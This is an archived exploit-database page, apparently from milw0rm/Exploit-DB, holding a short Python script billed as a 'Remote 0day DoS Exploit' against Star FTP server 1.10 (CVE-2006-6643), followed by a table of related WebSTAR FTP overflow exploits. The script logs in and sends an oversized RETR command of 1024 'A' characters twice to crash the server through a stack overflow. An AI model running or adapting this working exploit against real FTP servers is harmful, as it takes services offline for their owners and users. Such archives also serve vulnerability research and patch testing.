# Star FTP server 1.10
# Bug type: stack overflow
# Found by Necro <neco * ihack.pl> http://iHACK.pl
from socket import *
from sys import exit
print '\n[*] Star FTP server 1.10 Remote 0day DoS Exploit'
print '[*] Bug found by Necro <necro*ihack.pl> http://iHACK.pl'
host = '127.0.0.1'
port = 21
username = 'necro'
password = 'dupa'
evil = 'RETR' + '\x20' + '\x41' * 1024 + '\r\n'
s = socket(AF_INET, SOCK_STREAM)
try:
s.connect((host, port))
except:
print '\n[-] Connection Error'
exit()
s.recv(1024)
s.send('USER' + '\x20' + username + '\r\n')
s.recv(1024)
s.send('PASS' + '\x20' + password + '\r\n')
s.recv(1024)
s.send('PORT 2000\r\n')
s.recv(1024)
s.send(evil)
s.recv(1024)
s.send(evil)
s.close()
print '[+] Done, shutdown.'
# milw0rm.com [2006-12-17]
Related Exploits
Trying to match CVEs (1): CVE-2006-6643Trying to match OSVDBs (1): 32334
Trying to match setup file: 610955886bd3c7e4e2d25a51e2687258
Other Possible E-DB Search Terms: Star FTP Server 1.10, Star FTP Server
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2010-09-20 |  |
|
WebSTAR FTP Server - USER Overflow (Metasploit) | Metasploit |
| 2004-07-13 | |
|
WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit) | ddz |
| 2003-09-11 | |
|
4D WebSTAR FTP Server Suite - Remote Buffer Overflow | B-r00t |